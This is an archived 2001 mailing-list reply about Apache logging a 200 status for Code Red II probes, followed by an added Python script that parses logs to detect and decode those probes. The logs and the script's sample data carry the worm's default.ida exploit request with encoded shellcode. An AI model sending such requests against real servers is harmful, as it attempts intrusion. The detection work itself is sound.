Re: [logs] 200 return code on Code Red II against Apache?

From: Dennis Jenkins (djenkinsat_private)
Date: Wed Sep 12 2001 - 13:57:53 PDT


    Yes, I have four of them (very odd...)
    
    root@www:/var/log/apache# grep "default.ida" usb-access.log | grep "HTTP/1.0\" 200"
    192.192.135.153 - - [05/Aug/2001:22:13:19 -0500] "GET
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    HTTP/1.0" 200 -
    211.41.178.2 - - [20/Aug/2001:05:06:41 -0500] "GET
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    HTTP/1.0" 200 -
    200.48.188.155 - - [22/Aug/2001:16:36:36 -0500] "GET
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    HTTP/1.0" 200 -
    195.117.169.40 - - [04/Sep/2001:03:51:49 -0500] "GET
    /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 
    HTTP/1.0" 200 -
    root@www:/var/log/apache#
    
    
    Sweth Chandramouli wrote:
    > 
    >         This probably isn't appropriate for this list, or at
    > least is more appropriate for other lists, but I'm tired (and about to
    > go to sleep now that I've finally confirmed that none of my friends have
    > been blown up or crushed by falling buildings) and figured the folks here
    > might be likely to have seen this if anyone has.  So, has anyone seen an
    > Apache server return a 200 rather than 404 (according to Apache's logs)
    > in response to an attempted Code Red II exploit?  I've seen a single
    > occurrence of it to date, on a Solaris machine that quite regularly gets
    > such attempts; all of the log entries for those other attempts (both
    > before and since) had the proper 404 response code, but this particular
    > one doesn't:
    > 
    > ct740592-a.westprt1.ky.home.com - - [11/Sep/2001:12:21:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a  HTTP/1.0" 200 - "-" "-"
    > 
    >         .  I've only tracked down one other example of this
    > mentioned on the web, at
    > <http://www.geocrawler.com/lists/3/Debian-Linux/199/25/6335051/>; Ian,
    > who reported that incident, never figured out what caused it, either.
    > 
    >         Could anyone who has seen this (or has a good idea of what
    > it is) email me off-list?
    > 
    >         Thanks,
    > 
    >         Sweth.
    > 
    > --
    > Sweth Chandramouli ; <svcat_private>
    > President, Idiopathic Systems Consulting
    > 
    
    -- 
    djenkinsat_private                           Universal Savings Bank.
    Security Administrator, Unix Administrator, Alpha Geek
    
    The three most dangerous things are a programmer with a soldering
    iron, a manager who codes, and a user who gets ideas.
    
    ---------------------------------------------------------------------
    To unsubscribe, e-mail: loganalysis-unsubscribeat_private
    For additional commands, e-mail: loganalysis-helpat_private
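The thread boils down to one log-analysis question: of the default.ida probes an Apache server logged, which status did it return for each, and did any get a 200? The following is an added example (not code posted by Dennis or Sweth) that parses common/combined-format access-log lines, tolerates the worm's double space before "HTTP/1.0" visible in Sweth's entry, tallies default.ida probes by status, flags any 2xx, and decodes the %uXXXX escapes to the bytes they represent. The log lines, hosts and timestamps inside it are constructed to mirror the ones in the thread; the filler length in the sample request is arbitrary.

```python
"""Audit Apache access logs for Code Red II probes and report the HTTP status
Apache actually returned for each.

Added example for this thread, not code posted by either participant. The log
lines below are constructed to mirror the ones in the thread; hosts and
timestamps are made up.
"""
import re
import struct
from collections import Counter

# Code Red II request as logged by Apache: "/default.ida?" + filler + %u-encoded
# payload. The %u chunks are those quoted in the thread; the filler length here
# is arbitrary (the worm sends a much longer run of X's).
CODE_RED_II_REQUEST = (
    "/default.ida?" + "X" * 40
    + "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    + "%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a"
)

# Constructed sample log (common and combined format). The third line has two
# spaces before HTTP/1.0, as in the entry Sweth posted.
SAMPLE_LOG = [
    f'10.0.0.1 - - [05/Aug/2001:22:13:19 -0500] "GET {CODE_RED_II_REQUEST} HTTP/1.0" 404 -',
    f'10.0.0.2 - - [20/Aug/2001:05:06:41 -0500] "GET {CODE_RED_II_REQUEST} HTTP/1.0" 200 -',
    f'probe.example.net - - [11/Sep/2001:12:21:28 -0400] "GET {CODE_RED_II_REQUEST}  HTTP/1.0" 200 - "-" "-"',
    '10.0.0.3 - - [22/Aug/2001:16:36:36 -0500] "GET /index.html HTTP/1.0" 200 1234',
    f'10.0.0.4 - - [04/Sep/2001:03:51:49 -0500] "GET {CODE_RED_II_REQUEST} HTTP/1.0" 400 -',
]

# Common Log Format prefix. \s+ between path and protocol tolerates the worm's
# double space; the unanchored tail accepts combined-format referer/agent.
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)\s+(?P<proto>[^"]*)" (?P<status>\d{3}|-) (?P<size>\S+)'
)


def parse_clf(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def is_default_ida_probe(path):
    return path.lower().startswith("/default.ida?")


def classify_variant(path):
    """The filler letter distinguishes the published Code Red signatures:
    N-filler is Code Red v1/v2, X-filler is Code Red II."""
    query = path.split("?", 1)[1] if "?" in path else ""
    if query.startswith("N"):
        return "Code Red v1/v2"
    if query.startswith("X"):
        return "Code Red II"
    return "unknown default.ida request"


def decode_percent_u(path):
    """Decode IIS-style %uXXXX escapes to the little-endian bytes they encode.
    For the thread's payload the first bytes are 90 90 58 68 d3 cb 01 78,
    i.e. x86 nop, nop, pop eax, push 0x7801cbd3."""
    words = re.findall(r"%u([0-9a-fA-F]{4})", path)
    return b"".join(struct.pack("<H", int(w, 16)) for w in words)


def analyze(lines):
    """Count default.ida probes per status code and list any that got a 2xx."""
    by_status = Counter()
    anomalies = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None or not is_default_ida_probe(rec["path"]):
            continue
        by_status[rec["status"]] += 1
        if rec["status"].startswith("2"):
            anomalies.append({"host": rec["host"], "time": rec["time"],
                              "variant": classify_variant(rec["path"])})
    return {"by_status": dict(by_status), "anomalies": anomalies}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for status, n in sorted(report["by_status"].items()):
        print(f"{status}: {n} default.ida probe(s)")
    for a in report["anomalies"]:
        print(f"2xx for {a['variant']} from {a['host']} at {a['time']}")
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; the grep in Dennis's message finds the same 200 entries, but tallying every status lets you see whether the 200s are a handful of outliers against a background of 404s, as Sweth describes, or something systematic.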
    



    This archive was generated by hypermail 2b30 : Wed Sep 12 2001 - 14:01:33 PDT